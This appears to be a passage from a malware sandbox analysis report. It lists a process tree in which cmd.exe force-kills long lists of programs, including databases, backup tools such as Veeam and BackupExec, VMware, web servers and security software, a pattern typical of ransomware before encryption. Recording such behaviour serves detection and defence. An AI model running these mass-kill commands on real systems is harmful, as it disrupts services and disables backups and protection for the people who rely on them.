      taskkill /IM GoogleCrashHandler64.exe /F
      4⤵
      PID:5840
  - - C:\Windows\SysWOW64\taskkill.exe
      taskkill /IM GoogleUpdate.exe /F
      4⤵
      PID:7560
  - - C:\Windows\SysWOW64\taskkill.exe
      taskkill /IM cohernece.exe /F
      4⤵
      Kills process with taskkill
      PID:4592
  - - C:\Windows\SysWOW64\taskkill.exe
      taskkill /IM vmware-tray.exe /F
      4⤵
      PID:5676
  - - C:\Windows\SysWOW64\taskkill.exe
      taskkill /IM MsDtsSrvr.exe /F
      4⤵
      PID:7404
  - - C:\Windows\SysWOW64\taskkill.exe
      taskkill /IM msmdsrv.exe /F
      4⤵
      PID:6924
  - - C:\Windows\SysWOW64\taskkill.exe
      taskkill /IM "FileZilla server.exe" /F
      4⤵
      PID:7296
  - - C:\Windows\SysWOW64\taskkill.exe
      taskkill /IM UpdateData.exe /F
      4⤵
      Kills process with taskkill
      PID:6528
  - - C:\Windows\SysWOW64\taskkill.exe
      taskkill /IM WebApi.Host.exe /F
      4⤵
      PID:7708
  - - C:\Windows\SysWOW64\taskkill.exe
      taskkill /IM VGAuthService.exe /F
      4⤵
      Suspicious use of AdjustPrivilegeToken
      PID:5208
  - - C:\Windows\SysWOW64\taskkill.exe
      taskkill /IM omtsreco.exe /F
      4⤵
      PID:7016
  - - C:\Windows\SysWOW64\taskkill.exe
      taskkill /IM TNSLSNR.exe /F
      4⤵
      Kills process with taskkill
      PID:760
  - - C:\Windows\SysWOW64\taskkill.exe
      taskkill /IM oracle.exe /F
      4⤵
      PID:2412
  - - C:\Windows\SysWOW64\taskkill.exe
      taskkill /IM msdtc.exe /F
      4⤵
      Kills process with taskkill
      PID:5984
  - - C:\Windows\SysWOW64\taskkill.exe
      taskkill /IM mmc.exe /F
      4⤵
      Suspicious use of AdjustPrivilegeToken
      PID:5552
  - - C:\Windows\SysWOW64\taskkill.exe
      taskkill /IM emagent.exe /F
      4⤵
      PID:4644
  - - C:\Windows\SysWOW64\taskkill.exe
      taskkill /IM SoftMgrLite.exe /F
      4⤵
      PID:5460
  - - C:\Windows\SysWOW64\taskkill.exe
      taskkill /IM UIODetect.exe /F
      4⤵
      PID:7768
  - - C:\Windows\SysWOW64\taskkill.exe
      taskkill /IM AutoDealService.exe /F
      4⤵
      PID:6984
  - - C:\Windows\SysWOW64\taskkill.exe
      taskkill /IM Admin.exe /F
      4⤵
      PID:7160
  - - C:\Windows\SysWOW64\taskkill.exe
      taskkill /IM IDDAService.exe /F
      4⤵
      PID:7368
  - - C:\Windows\SysWOW64\taskkill.exe
      taskkill /IM EnergyDataService.exe /F
      4⤵
      PID:6660
  - - C:\Windows\SysWOW64\taskkill.exe
      taskkill /IM EnterprisePortal.exe /F
      4⤵
      PID:1120
- - C:\Windows\SysWOW64\cmd.exe
    cmd /c "color e & @taskkill /IM ThunderPlatform.exe /F & @taskkill /IM iexplore.exe /F & @taskkill /IM vm-agent.exe /F & @taskkill /IM vm-agent-daemon.exe /F & @taskkill /IM eSightService.exe /F & @taskkill /IM cygrunsrv.exe /F & @taskkill /IM wrapper.exe /F & @taskkill /IM nginx.exe /F & @taskkill /IM node.exe /F & @taskkill /IM sshd.exe /F & @taskkill /IM vm-tray.exe /F & @taskkill /IM iempwatchdog.exe /F & @taskkill /IM sqlwriter.exe /F & @taskkill /IM php.exe /F & @taskkill /IM "notepad++.exe" /F & @taskkill /IM "phpStudy.exe" /F & @taskkill /IM OPCClient.exe /F & @taskkill /IM navicat.exe /F & @taskkill /IM SupportAssistAgent.exe /F & @taskkill /IM SunloginClient.exe /F & @taskkill /IM SOUNDMAN.exe /F & @taskkill /IM WeChat.exe /F & @taskkill /IM TXPlatform.exe /F & @taskkill /IM Tencentdll.exe /F & @taskkill /IM httpd.exe /F & @taskkill /IM jenkins.exe /F & @taskkill /IM QQ.exe /F & @taskkill /IM HaoZip.exe /F & @taskkill /IM HaoZipScan.exe /F & @taskkill /IM navicat.exe /F & @taskkill /IM TSVNCache.exe /F & @taskkill /IM RAVCpl64.exe /F & @taskkill /IM secbizsrv.exe /F & @taskkill /IM aliwssv.exe /F & @taskkill /IM Helper_Haozip.exe /F & @taskkill /IM acrotray.exe /F & @taskkill /IM "FileZilla Server Interface.exe" /F & @taskkill /IM YoudaoNote.exe /F & @taskkill /IM YNoteCefRender.exe /F & @taskkill /IM idea.exe /F & @taskkill /IM fsnotifier.exe /F & @taskkill /IM picpick.exe /F & @taskkill /IM lantern.exe /F & @taskkill /IM sysproxy-cmd.exe /F & @taskkill /IM service.exe /F & @taskkill /IM pcas.exe /F & @taskkill /IM PresentationFontCache.exe /F & @taskkill /IM RtWlan.exe /F & @taskkill /IM monitor.exe /F & @taskkill /IM Correspond.exe /F & @taskkill /IM ChatServer.exe /F & @taskkill /IM InetMgr.exe /F & @taskkill /IM LogonServer.exe /F & @taskkill /IM GameServer.exe /F & @taskkill /IM ServUAdmin.exe /F & @taskkill /IM ServUDaemon.exe /F & @taskkill /IM update0.exe /F & @taskkill /IM server.exe /F & @taskkill /IM w3wp.exe /F & @taskkill /IM notepad.exe /F & @taskkill /IM PalmInputService.exe /F & @taskkill /IM PalmInputGuard.exe /F & @taskkill /IM UpdateServer.exe /F & @taskkill /IM UpdateGate.exe /F & @taskkill /IM DBServer.exe /F & @taskkill /IM LoginGate.exe /F & @taskkill /IM SelGate.exe /F & @taskkill /IM RunGate.exe /F & @taskkill /IM M2Server.exe /F & @taskkill /IM LogDataServer.exe /F & @taskkill /IM LoginSrv.exe /F & @taskkill /IM sqlceip.exe /F & @taskkill /IM mqsvc.exe /F & @taskkill /IM RefundOrder.exe /F & @taskkill /IM ClamTray.exe /F & @taskkill /IM AdobeARM.exe /F & @taskkill /IM veeam.backup.shell.exe /F & @taskkill /IM VpxClient.exe /F & @taskkill /IM vmware-vmrc.exe /F & @taskkill /IM DSCPatchService.exe /F & @taskkill /IM scktsrvr.exe /F & @taskkill /IM ServerManager.exe /F & @taskkill /IM Dispatcher.exe /F & @taskkill /IM EFDispatcher.exe /F & @taskkill /IM sqlceip.exe /F & @taskkill /IM mqsvc.exe /F & @taskkill /IM RefundOrder.exe /F & @taskkill /IM ClamTray.exe /F & @taskkill /IM AdobeARM.exe /F & @taskkill /IM veeam.backup.shell.exe /F & @taskkill /IM VpxClient.exe /F & @taskkill /IM vmware-vmrc.exe /F & @taskkill /IM DSCPatchService.exe /F & @taskkill /IM scktsrvr.exe /F & @taskkill /IM ServerManager.exe /F & @taskkill /IM Dispatcher.exe /F & @taskkill /IM EFDispatcher.exe /F & @taskkill /IM ClamWin.exe /F & @taskkill /IM srvany.exe /F & @taskkill /IM JT_AG-8332.exe /F & @taskkill /IM XXTClient.exe /F & @taskkill /IM clean.exe /F & @taskkill /IM sqlservr.exe /F & @taskkill /IM "Net.Service.exe" /F & @taskkill /IM plsqldev.exe /F & @taskkill /IM splwow64.exe /F & @taskkill /IM Oobe.exe /F & @taskkill /IM QQYService.exe /F & @taskkill /IM sqlservr.exe /F & @taskkill /IM SGTool.exe /F & @taskkill /IM postgres.exe /F & @taskkill /IM AppVShNotify.exe /F & @taskkill /IM OfficeClickToRun.exe /F & @taskkill /IM EntDT.exe /F & @taskkill /IM EntPublish.exe /F"
    3⤵
    PID:3712
  - - C:\Windows\SysWOW64\taskkill.exe
      taskkill /IM ThunderPlatform.exe /F
      4⤵
      PID:1828
  - - C:\Windows\SysWOW64\taskkill.exe
      taskkill /IM iexplore.exe /F
      4⤵
      PID:2264
  - - C:\Windows\SysWOW64\taskkill.exe
      taskkill /IM vm-agent.exe /F
      4⤵
      PID:6116
  - - C:\Windows\SysWOW64\taskkill.exe
      taskkill /IM vm-agent-daemon.exe /F
      4⤵
      PID:5552
  - - C:\Windows\SysWOW64\taskkill.exe
      taskkill /IM eSightService.exe /F
      4⤵
      PID:2624
  - - C:\Windows\SysWOW64\taskkill.exe
      taskkill /IM cygrunsrv.exe /F
      4⤵
      PID:2888
  - - C:\Windows\SysWOW64\taskkill.exe
      taskkill /IM wrapper.exe /F
      4⤵
      PID:5720
  - - C:\Windows\SysWOW64\taskkill.exe
      taskkill /IM nginx.exe /F
      4⤵
      PID:3988
  - - C:\Windows\SysWOW64\taskkill.exe
      taskkill /IM node.exe /F
      4⤵
      PID:5992
  - - C:\Windows\SysWOW64\taskkill.exe
      taskkill /IM sshd.exe /F
      4⤵
      Kills process with taskkill
      PID:2660
  - - C:\Windows\SysWOW64\taskkill.exe
      taskkill /IM vm-tray.exe /F
      4⤵
      PID:5896
  - - C:\Windows\SysWOW64\taskkill.exe
      taskkill /IM iempwatchdog.exe /F
      4⤵
      PID:6056
  - - C:\Windows\SysWOW64\taskkill.exe
      taskkill /IM sqlwriter.exe /F
      4⤵
      PID:5152
  - - C:\Windows\SysWOW64\taskkill.exe
      taskkill /IM php.exe /F
      4⤵
      PID:3988
  - - C:\Windows\SysWOW64\taskkill.exe
      taskkill /IM "notepad++.exe" /F
      4⤵
      PID:5780
  - - C:\Windows\SysWOW64\taskkill.exe
      taskkill /IM "phpStudy.exe" /F
      4⤵
      PID:216
  - - C:\Windows\SysWOW64\taskkill.exe
      taskkill /IM OPCClient.exe /F
      4⤵
      PID:4800
  - - C:\Windows\SysWOW64\taskkill.exe
      taskkill /IM navicat.exe /F
      4⤵
      PID:5548
  - - C:\Windows\SysWOW64\taskkill.exe
      taskkill /IM SupportAssistAgent.exe /F
      4⤵
      PID:2700
  - - C:\Windows\SysWOW64\taskkill.exe
      taskkill /IM SunloginClient.exe /F
      4⤵
      Kills process with taskkill
      PID:4468
  - - C:\Windows\SysWOW64\taskkill.exe
      taskkill /IM SOUNDMAN.exe /F
      4⤵
      PID:5488
  - - C:\Windows\SysWOW64\taskkill.exe
      taskkill /IM WeChat.exe /F
      4⤵
      PID:5100
  - - C:\Windows\SysWOW64\taskkill.exe
      taskkill /IM TXPlatform.exe /F
      4⤵
      PID:2784
  - - C:\Windows\SysWOW64\taskkill.exe
      taskkill /IM Tencentdll.exe /F
      4⤵
      PID:5860
  - - C:\Windows\SysWOW64\taskkill.exe
      taskkill /IM httpd.exe /F
      4⤵
      PID:4320
  - - C:\Windows\SysWOW64\taskkill.exe
      taskkill /IM jenkins.exe /F
      4⤵
      PID:6016
  - - C:\Windows\SysWOW64\taskkill.exe
      taskkill /IM QQ.exe /F
      4⤵
      PID:5564
  - - C:\Windows\SysWOW64\taskkill.exe
      taskkill /IM HaoZip.exe /F
      4⤵
      PID:2412
  - - C:\Windows\SysWOW64\taskkill.exe
      taskkill /IM HaoZipScan.exe /F
      4⤵
      PID:6200
  - - C:\Windows\SysWOW64\taskkill.exe
      taskkill /IM navicat.exe /F
      4⤵
      PID:5864
  - - C:\Windows\SysWOW64\taskkill.exe
      taskkill /IM TSVNCache.exe /F
      4⤵
      PID:4376
  - - C:\Windows\SysWOW64\taskkill.exe
      taskkill /IM RAVCpl64.exe /F
      4⤵
      PID:4916
  - - C:\Windows\SysWOW64\taskkill.exe
      taskkill /IM secbizsrv.exe /F
      4⤵
      PID:812
  - - C:\Windows\SysWOW64\taskkill.exe
      taskkill /IM aliwssv.exe /F
      4⤵
      PID:760
  - - C:\Windows\SysWOW64\taskkill.exe
      taskkill /IM Helper_Haozip.exe /F
      4⤵
      PID:5996
  - - C:\Windows\SysWOW64\taskkill.exe
      taskkill /IM acrotray.exe /F
      4⤵
      PID:8188
  - - C:\Windows\SysWOW64\taskkill.exe
      taskkill /IM "FileZilla Server Interface.exe" /F
      4⤵
      PID:832
  - - C:\Windows\SysWOW64\taskkill.exe
      taskkill /IM YoudaoNote.exe /F
      4⤵
      PID:3568
  - - C:\Windows\SysWOW64\taskkill.exe
      taskkill /IM YNoteCefRender.exe /F
      4⤵
      PID:940
  - - C:\Windows\SysWOW64\taskkill.exe
      taskkill /IM idea.exe /F
      4⤵
      PID:6412
  - - C:\Windows\SysWOW64\taskkill.exe
      taskkill /IM fsnotifier.exe /F
      4⤵
      PID:3276
  - - C:\Windows\SysWOW64\taskkill.exe
      taskkill /IM picpick.exe /F
      4⤵
      PID:6340
  - - C:\Windows\SysWOW64\taskkill.exe
      taskkill /IM lantern.exe /F
      4⤵
      PID:4480
  - - C:\Windows\SysWOW64\taskkill.exe
      taskkill /IM sysproxy-cmd.exe /F
      4⤵
      PID:4236
  - - C:\Windows\SysWOW64\taskkill.exe
      taskkill /IM service.exe /F
      4⤵
      PID:5660
  - - C:\Windows\SysWOW64\taskkill.exe
      taskkill /IM pcas.exe /F
      4⤵
      PID:7352
  - - C:\Windows\SysWOW64\taskkill.exe
      taskkill /IM PresentationFontCache.exe /F
      4⤵
      PID:5500
  - - C:\Windows\SysWOW64\taskkill.exe
      taskkill /IM RtWlan.exe /F
      4⤵
      PID:6552
  - - C:\Windows\SysWOW64\taskkill.exe
      taskkill /IM monitor.exe /F
      4⤵
      PID:8080
  - - C:\Windows\SysWOW64\taskkill.exe
      taskkill /IM Correspond.exe /F
      4⤵
      PID:5648
  - - C:\Windows\SysWOW64\taskkill.exe
      taskkill /IM ChatServer.exe /F
      4⤵
      PID:6040
  - - C:\Windows\SysWOW64\taskkill.exe
      taskkill /IM InetMgr.exe /F
      4⤵
      PID:2368
- - C:\Windows\SysWOW64\cmd.exe
    cmd /c "color e & @taskkill /IM pg_ctl.exe /F & @taskkill /IM rcrelay.exe /F & @taskkill /IM SogouImeBroker.exe /F & @taskkill /IM CCenter.exe /F & @taskkill /IM ScanFrm.exe /F & @taskkill /IM d_manage.exe /F & @taskkill /IM RsTray.exe /F & @taskkill /IM wampmanager.exe /F & @taskkill /IM RavTray.exe /F & @taskkill /IM mssearch.exe /F & @taskkill /IM sqlmangr.exe /F & @taskkill /IM msftesql.exe /F & @taskkill /IM SyncBaseSvr.exe /F & @taskkill /IM oracle.exe /F & @taskkill /IM TNSLSNR.exe /F & @taskkill /IM SyncBaseConsole.exe /F & @taskkill /IM aspnet_state.exe /F & @taskkill /IM AutoBackUpEx.exe /F & @taskkill /IM redis-server.exe /F & @taskkill /IM MySQLNotifier.exe /F & @taskkill /IM oravssw.exe /F & @taskkill /IM fppdis5.exe /F & @taskkill /IM His6Service.exe /F & @taskkill /IM dinotify.exe /F & @taskkill /IM JhTask.exe /F & @taskkill /IM Executer.exe /F & @taskkill /IM AllPassCBHost.exe /F & @taskkill /IM ap_nginx.exe /F & @taskkill /IM AndroidServer.exe /F & @taskkill /IM XT.exe /F & @taskkill /IM XTService.exe /F & @taskkill /IM AllPassMCService.exe /F & @taskkill /IM IMEDICTUPDATE.exe /F & @taskkill /IM FlashHelperService.exe /F & @taskkill /IM ap_redis-server.exe /F & @taskkill /IM UtilDev.WebServer.Monitor.exe /F & @taskkill /IM UWS.AppHost.Clr2.x86.exe /F & @taskkill /IM FoxitProtect.exe /F & @taskkill /IM ftnlses.exe /F & @taskkill /IM ftusbrdwks.exe /F & @taskkill /IM ftusbrdsrv.exe /F & @taskkill /IM ftnlsv.exe /F & @taskkill /IM Syslogd_Service.exe /F & @taskkill /IM UWS.HighPrivilegeUtilities.exe /F & @taskkill /IM ftusbsrv.exe /F & @taskkill /IM UWS.LowPrivilegeUtilities.exe /F & @taskkill /IM UWS.AppHost.Clr2.AnyCpu.exe /F & @taskkill /IM winguard_x64.exe /F & @taskkill /IM vmconnect.exe /F & @taskkill /IM UWS.AppHost.Clr2.x86.exe /F & @taskkill /IM firefox.exe /F & @taskkill /IM usbrdsrv.exe /F & @taskkill /IM usbserver.exe /F & @taskkill /IM Foxmail.exe /F & @taskkill /IM qemu-ga.exe /F & @taskkill /IM wwbizsrv.exe /F & @taskkill /IM ZTEFileTranS.exe /F & @taskkill /IM ZTEUsbIpc.exe /F & @taskkill /IM ZTEUsbIpcGuard.exe /F & @taskkill /IM AlibabaProtect.exe /F & @taskkill /IM kbasesrv.exe /F & @taskkill /IM ZTEVdservice.exe /F & @taskkill /IM MMRHookService.exe /F & @taskkill /IM extjob.exe /F & @taskkill /IM IpOverUsbSvc.exe /F & @taskkill /IM VMwareTray.exe /F & @taskkill /IM devenv.exe /F & @taskkill /IM PerfWatson2.exe /F & @taskkill /IM ServiceHub.Host.Node.x86.exe /F & @taskkill /IM ServiceHub.IdentityHost.exe /F & @taskkill /IM ServiceHub.VSDetouredHost.exe /F & @taskkill /IM ServiceHub.SettingsHost.exe /F & @taskkill /IM ServiceHub.Host.CLR.x86.exe /F & @taskkill /IM ServiceHub.RoslynCodeAnalysisService32.exe /F & @taskkill /IM ServiceHub.DataWarehouseHost.exe /F & @taskkill /IM Microsoft.VisualStudio.Web.Host.exe /F & @taskkill /IM SQLEXPRWT.exe /F & @taskkill /IM setup.exe /F & @taskkill /IM remote.exe /F & @taskkill /IM setup100.exe /F & @taskkill /IM landingpage.exe /F & @taskkill /IM WINWORD.exe /F & @taskkill /IM KuaiYun.exe /F & @taskkill /IM HwsHostPanel.exe /F & @taskkill /IM NovelSpider.exe /F & @taskkill /IM Service_KMS.exe /F & @taskkill /IM WebServer.exe /F & @taskkill /IM ChsIME.exe /F & @taskkill /IM btPanel.exe /F & @taskkill /IM Protect_2345Explorer.exe /F & @taskkill /IM Pic_2345Svc.exe /F & @taskkill /IM vmware-converter-a.exe /F & @taskkill /IM vmware-converter.exe /F & @taskkill /IM vmware.exe /F & @taskkill /IM vmware-unity-helper.exe /F & @taskkill /IM vmware-vmx.exe /F & @taskkill /IM vmware-vmx.exe /F & @taskkill /IM usysdiag.exe /F & @taskkill /IM PopBlock.exe /F & @taskkill /IM gsinterface.exe /F & @taskkill /IM Gemstar.Group.CRS.Client.exe /F & @taskkill /IM TenpayServer.exe /F & @taskkill /IM RemoteExecService.exe /F & @taskkill /IM VS_TrueCorsManager.exe /F & @taskkill /IM ntpsvr-2019-01-22-wgs84.exe /F & @taskkill /IM rtkjob-ion.exe /F & @taskkill /IM ntpsvr-2019-01-22-no-usrcheck.exe /F & @taskkill /IM NtripCaster-2019-01-08.exe /F & @taskkill /IM BACSTray.exe /F & @taskkill /IM protect.exe /F & @taskkill /IM hfs.exe /F & @taskkill /IM jzmis.exe /F & @taskkill /IM NewFileTime_x64.exe /F & @taskkill /IM 2345MiniPage.exe /F & @taskkill /IM JMJ_server.exe /F & @taskkill /IM cacls.exe /F & @taskkill /IM gpsdaemon.exe /F & @taskkill /IM gpsusersvr.exe /F & @taskkill /IM gpsdownsvr.exe /F & @taskkill /IM gpsstoragesvr.exe /F & @taskkill /IM gpsdataprocsvr.exe /F & @taskkill /IM gpsftpd.exe /F & @taskkill /IM gpsmysqld.exe /F & @taskkill /IM gpstomcat6.exe /F & @taskkill /IM gpsloginsvr.exe /F & @taskkill /IM gpsmediasvr.exe /F & @taskkill /IM gpsgatewaysvr.exe /F & @taskkill /IM gpssvrctrl.exe /F & @taskkill /IM zabbix_agentd.exe /F"
    3⤵
    PID:3312
  - - C:\Windows\SysWOW64\taskkill.exe
      taskkill /IM pg_ctl.exe /F
      4⤵
      PID:1816
  - - C:\Windows\SysWOW64\taskkill.exe
      taskkill /IM rcrelay.exe /F
      4⤵
      PID:3720
  - - C:\Windows\SysWOW64\taskkill.exe
      taskkill /IM SogouImeBroker.exe /F
      4⤵
      PID:5212
  - - C:\Windows\SysWOW64\taskkill.exe
      taskkill /IM CCenter.exe /F
      4⤵
      Kills process with taskkill
      PID:4360
  - - C:\Windows\SysWOW64\taskkill.exe
      taskkill /IM ScanFrm.exe /F
      4⤵
      PID:5308
  - - C:\Windows\SysWOW64\taskkill.exe
      taskkill /IM d_manage.exe /F
      4⤵
      Suspicious use of AdjustPrivilegeToken
      PID:5620
  - - C:\Windows\SysWOW64\taskkill.exe
      taskkill /IM RsTray.exe /F
      4⤵
      PID:968
  - - C:\Windows\SysWOW64\taskkill.exe
      taskkill /IM wampmanager.exe /F
      4⤵
      PID:5332
  - - C:\Windows\SysWOW64\taskkill.exe
      taskkill /IM RavTray.exe /F
      4⤵
      PID:5664
  - - C:\Windows\SysWOW64\taskkill.exe
      taskkill /IM mssearch.exe /F
      4⤵
      PID:5424
  - - C:\Windows\SysWOW64\taskkill.exe
      taskkill /IM sqlmangr.exe /F
      4⤵
      PID:5484
  - - C:\Windows\SysWOW64\taskkill.exe
      taskkill /IM msftesql.exe /F
      4⤵
      PID:6132
  - - C:\Windows\SysWOW64\taskkill.exe
      taskkill /IM SyncBaseSvr.exe /F
      4⤵
      PID:3896
  - - C:\Windows\SysWOW64\taskkill.exe
      taskkill /IM oracle.exe /F
      4⤵
      Kills process with taskkill
      PID:4392
  - - C:\Windows\SysWOW64\taskkill.exe
      taskkill /IM TNSLSNR.exe /F
      4⤵
      PID:6024
  - - C:\Windows\SysWOW64\taskkill.exe
      taskkill /IM SyncBaseConsole.exe /F
      4⤵
      PID:6072
  - - C:\Windows\SysWOW64\taskkill.exe
      taskkill /IM aspnet_state.exe /F
      4⤵
      PID:6084
  - - C:\Windows\SysWOW64\taskkill.exe
      taskkill /IM AutoBackUpEx.exe /F
      4⤵
      Suspicious use of AdjustPrivilegeToken
      PID:2888
  - - C:\Windows\SysWOW64\taskkill.exe
      taskkill /IM redis-server.exe /F
      4⤵
      PID:2752
  - - C:\Windows\SysWOW64\taskkill.exe
      taskkill /IM MySQLNotifier.exe /F
      4⤵
      PID:5264
  - - C:\Windows\SysWOW64\taskkill.exe
      taskkill /IM oravssw.exe /F
      4⤵
      PID:4280
  - - C:\Windows\SysWOW64\taskkill.exe
      taskkill /IM fppdis5.exe /F
      4⤵
      PID:5404
  - - C:\Windows\SysWOW64\taskkill.exe
      taskkill /IM His6Service.exe /F
      4⤵
      Kills process with taskkill
      PID:4516
  - - C:\Windows\SysWOW64\taskkill.exe
      taskkill /IM dinotify.exe /F
      4⤵
      PID:5484
  - - C:\Windows\SysWOW64\taskkill.exe
      taskkill /IM JhTask.exe /F
      4⤵
      PID:5612
  - - C:\Windows\SysWOW64\taskkill.exe
      taskkill /IM Executer.exe /F
      4⤵
      PID:7520
  - - C:\Windows\SysWOW64\taskkill.exe
      taskkill /IM AllPassCBHost.exe /F
      4⤵
      PID:5816
  - - C:\Windows\SysWOW64\taskkill.exe
      taskkill /IM ap_nginx.exe /F
      4⤵
      PID:4028
  - - C:\Windows\SysWOW64\taskkill.exe
      taskkill /IM AndroidServer.exe /F
      4⤵
      PID:7364
  - - C:\Windows\SysWOW64\taskkill.exe
      taskkill /IM XT.exe /F
      4⤵
      PID:2704
  - - C:\Windows\SysWOW64\taskkill.exe
      taskkill /IM XTService.exe /F
      4⤵
      PID:7740
  - - C:\Windows\SysWOW64\taskkill.exe
      taskkill /IM AllPassMCService.exe /F
      4⤵
      PID:1616
  - - C:\Windows\SysWOW64\taskkill.exe
      taskkill /IM IMEDICTUPDATE.exe /F
      4⤵
      PID:2848
  - - C:\Windows\SysWOW64\taskkill.exe
      taskkill /IM FlashHelperService.exe /F
      4⤵
      PID:5876
  - - C:\Windows\SysWOW64\taskkill.exe
      taskkill /IM ap_redis-server.exe /F
      4⤵
      PID:6928
  - - C:\Windows\SysWOW64\taskkill.exe
      taskkill /IM UtilDev.WebServer.Monitor.exe /F
      4⤵
      PID:5840
  - - C:\Windows\SysWOW64\taskkill.exe
      taskkill /IM UWS.AppHost.Clr2.x86.exe /F
      4⤵
      PID:7396
  - - C:\Windows\SysWOW64\taskkill.exe
      taskkill /IM FoxitProtect.exe /F
      4⤵
      PID:5780
  - - C:\Windows\SysWOW64\taskkill.exe
      taskkill /IM ftnlses.exe /F
      4⤵
      Suspicious use of AdjustPrivilegeToken
      PID:5212
  - - C:\Windows\SysWOW64\taskkill.exe
      taskkill /IM ftusbrdwks.exe /F
      4⤵
      PID:1204
  - - C:\Windows\SysWOW64\taskkill.exe
      taskkill /IM ftusbrdsrv.exe /F
      4⤵
      PID:6492
  - - C:\Windows\SysWOW64\taskkill.exe
      taskkill /IM ftnlsv.exe /F
      4⤵
      PID:6476
  - - C:\Windows\SysWOW64\taskkill.exe
      taskkill /IM Syslogd_Service.exe /F
      4⤵
      PID:5544
  - - C:\Windows\SysWOW64\taskkill.exe
      taskkill /IM UWS.HighPrivilegeUtilities.exe /F
      4⤵
      PID:6644
  - - C:\Windows\SysWOW64\taskkill.exe
      taskkill /IM ftusbsrv.exe /F
      4⤵
      PID:8036
  - - C:\Windows\SysWOW64\taskkill.exe
      taskkill /IM UWS.LowPrivilegeUtilities.exe /F
      4⤵
      PID:5100
  - - C:\Windows\SysWOW64\taskkill.exe
      taskkill /IM UWS.AppHost.Clr2.AnyCpu.exe /F
      4⤵
      PID:7620
  - - C:\Windows\SysWOW64\taskkill.exe
      taskkill /IM winguard_x64.exe /F
      4⤵
      PID:6068
  - - C:\Windows\SysWOW64\taskkill.exe
      taskkill /IM vmconnect.exe /F
      4⤵
      PID:3168
  - - C:\Windows\SysWOW64\taskkill.exe
      taskkill /IM UWS.AppHost.Clr2.x86.exe /F
      4⤵
      PID:2768
  - - C:\Windows\SysWOW64\taskkill.exe
      taskkill /IM firefox.exe /F
      4⤵
      Kills process with taskkill
      PID:7868
- - C:\Windows\SysWOW64\cmd.exe
    cmd /c "color e & @taskkill /IM BackupExec.exe /F & @taskkill /IM Att.exe /F & @taskkill /IM mdm.exe /F & @taskkill /IM BackupExecManagementService.exe /F & @taskkill /IM bengine.exe /F & @taskkill /IM benetns.exe /F & @taskkill /IM beserver.exe /F & @taskkill /IM pvlsvr.exe /F & @taskkill /IM bedbg.exe /F & @taskkill /IM beremote.exe /F & @taskkill /IM beremote.exe /F & @taskkill /IM beremote.exe /F & @taskkill /IM beremote.exe /F & @taskkill /IM RemoteAssistProcess.exe /F & @taskkill /IM BarMoniService.exe /F & @taskkill /IM GoodGameSrv.exe /F & @taskkill /IM BarCMService.exe /F & @taskkill /IM TsService.exe /F & @taskkill /IM GoodGame.exe /F & @taskkill /IM BarServerView.exe /F & @taskkill /IM IcafeServicesTray.exe /F & @taskkill /IM BsAgent_0.exe /F & @taskkill /IM ControlServer.exe /F & @taskkill /IM DisklessServer.exe /F & @taskkill /IM DumpServer.exe /F & @taskkill /IM NetDiskServer.exe /F & @taskkill /IM PersonUDisk.exe /F & @taskkill /IM service_agent.exe /F & @taskkill /IM SoftMemory.exe /F & @taskkill /IM BarServer.exe /F & @taskkill /IM RtkNGUI64.exe /F & @taskkill /IM Serv-U-Tray.exe /F & @taskkill /IM QQPCSoftTrayTips.exe /F & @taskkill /IM SohuNews.exe /F & @taskkill /IM Serv-U.exe /F & @taskkill /IM QQPCRTP.exe /F & @taskkill /IM EasyFZS.exe /F & @taskkill /IM HaoYiShi.exe /F & @taskkill /IM HysMySQL.exe /F & @taskkill /IM wtautoreg.exe /F & @taskkill /IM ispiritPro.exe /F & @taskkill /IM CAService.exe /F & @taskkill /IM XAssistant.exe /F & @taskkill /IM TrustCA.exe /F & @taskkill /IM GEUU20003.exe /F & @taskkill /IM CertMgr.exe /F & @taskkill /IM eSafe_monitor.exe /F & @taskkill /IM MainExecute.exe /F & @taskkill /IM FastInvoice.exe /F & @taskkill /IM SoftMgrLite.exe /F & @taskkill /IM sesvc.exe /F & @taskkill /IM ScanFileServer.exe /F & @taskkill /IM Nuoadehgcgcd.exe /F & @taskkill /IM OpenFastAssist.exe /F & @taskkill /IM FastInvoiceAssist.exe /F & @taskkill /IM Nuoadfaggcje.exe /F & @taskkill /IM OfficeUpdate.exe /F & @taskkill /IM atkexComSvc.exe /F & @taskkill /IM FileTransferAgent.exe /F & @taskkill /IM MasterReplicatorAgent.exe /F & @taskkill /IM CrmAsyncService.exe /F & @taskkill /IM CrmAsyncService.exe /F & @taskkill /IM CrmUnzipService.exe /F & @taskkill /IM NscAuthService.exe /F & @taskkill /IM ReplicaReplicatorAgent.exe /F & @taskkill /IM ASMCUSvc.exe /F & @taskkill /IM OcsAppServerHost.exe /F & @taskkill /IM RtcCdr.exe /F & @taskkill /IM IMMCUSvc.exe /F & @taskkill /IM DataMCUSvc.exe /F & @taskkill /IM MeetingMCUSvc.exe /F & @taskkill /IM QmsSvc.exe /F & @taskkill /IM RTCSrv.exe /F & @taskkill /IM pnopagw.exe /F & @taskkill /IM NscAuth.exe /F & @taskkill /IM Microsoft.ActiveDirectory.WebServices.exe /F & @taskkill /IM DistributedCacheService.exe /F & @taskkill /IM c2wtshost.exe /F & @taskkill /IM Microsoft.Office.Project.Server.Calculation.exe /F & @taskkill /IM schedengine.exe /F & @taskkill /IM Microsoft.Office.Project.Server.Eventing.exe /F & @taskkill /IM Microsoft.Office.Project.Server.Queuing.exe /F & @taskkill /IM WSSADMIN.EXE /F & @taskkill /IM hostcontrollerservice.exe /F & @taskkill /IM noderunner.exe /F & @taskkill /IM OWSTIMER.EXE /F & @taskkill /IM wsstracing.exe /F & @taskkill /IM mssearch.exe /F & @taskkill /IM MySQLInstallerConsole.exe /F & @taskkill /IM EXCEL.EXE /F & @taskkill /IM consent.exe /F & @taskkill /IM RtkAudioService64.exe /F & @taskkill /IM RAVBg64.exe /F & @taskkill /IM FNPLicensingService64.exe /F & @taskkill /IM VisualSVNServer.exe /F & @taskkill /IM MotionBoard57.exe /F & @taskkill /IM MotionBoardRCService57.exe /F & @taskkill /IM LPManService.exe /F & @taskkill /IM RaRegistry.exe /F & @taskkill /IM RaAutoInstSrv.exe /F & @taskkill /IM RtHDVCpl.exe /F & @taskkill /IM DefenderDaemon.exe /F & @taskkill /IM BestSyncApp.exe /F & @taskkill /IM ApUI.exe /F & @taskkill /IM AutoUpdate.exe /F & @taskkill /IM LPManNotifier.exe /F & @taskkill /IM FieldAnalyst.exe /F & @taskkill /IM TimingGenerate.exe /F & @taskkill /IM Detector.exe /F & @taskkill /IM Estimator.exe /F & @taskkill /IM FA_Logwriter.exe /F & @taskkill /IM TrackingSrv.exe /F & @taskkill /IM 